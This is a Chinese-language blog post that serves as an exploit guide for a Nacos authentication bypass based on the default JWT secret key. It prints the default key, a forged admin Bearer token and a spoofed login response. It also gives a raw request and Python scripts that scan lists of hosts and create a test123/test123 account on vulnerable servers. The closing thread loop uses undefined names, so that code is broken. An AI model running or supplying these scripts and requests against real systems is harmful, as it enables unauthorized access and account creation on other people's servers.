Nacos 身份认证绕过
由于 secret.key 值为默认
### The default token(Base64 String):
nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
### 2.1.0 版本后
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
可使用 https://jwt.io/#debugger-io 生成可用的 token
如果需要登录至 nacos,输入任意账密进行抓包
把回显包替换为下面这个
HTTP/1.1 200
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Type: application/json; charset=utf-8
Date: Tue, 14 Mar 2023 16:34:47 GMT
Content-Length: 206
{
"accessToken": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"tokenTtl": 18000,
"globalAdmin": false,
"username": "nacos"
}
直接登录进去
直接添加用户
POST /nacos/v1/auth/users HTTP/1.1
Host:
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
username=test&password=test
批量验证
import requests
import urllib3
urllib3.disable_warnings()
# 定义自定义路径和Header
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
proxies = {'http': 'http://127.0.0.1:8080'}
header = {
"User-Agent": "Nacos-Server",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Pragma": "no-cache",
"Te": "trailers",
"Cache-Control": "no-cache",
}
# 从url.txt文件中读取URL列表
with open('url.txt', 'r') as f:
urls = f.read().splitlines()
# 循环发送GET请求并判断回显结果
for url in urls:
full_url = url + custom_path # 拼接完整URL
try:
response = requests.get(full_url,proxies=proxies, headers=header,verify=False,timeout=2)
if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
print(f'{url} 存在nacos身份验证绕过漏洞')
else:
print(f'{url} 不存在nacos身份验证绕过漏洞')
except requests.exceptions.RequestException as e:
print(f'{url} 访问失败 {e}')
脚本化添加用户
import sys
import requests
from termcolor import colored
import urllib3
urllib3.disable_warnings()
proxies = {'http': 'http://127.0.0.1:8080'}
# 获取命令行参数中的 URL
if len(sys.argv) < 2:
print("Usage: python test.py <url>")
sys.exit(1)
url = sys.argv[1]
post_url = "/nacos/v1/auth/users"
request_url = url + post_url
headers = {
"User-Agent": "Nacos-Server",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
}
data = {
"username": "test123",
"password": "test123",
}
response = requests.post(request_url, headers=headers, data=data, proxies=proxies,verify=False)
if response.status_code == 200 and response.content.find(b"ok") != -1:
print(colored('[*] ' + url + ' 存在nacos身份认证绕过漏洞! ', 'green'))
print(colored('已创建用户test123/test123', 'green'))
else:
print(colored('[-] ' + url + ' 不存在nacos身份认证绕过漏洞! n', 'red'))
threads = []
for url in urls:
t = threading.Thread(target=send_request, args=(url,))
threads.append(t)
t.start()
# 等待所有线程完成
for t in threads:
t.join()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容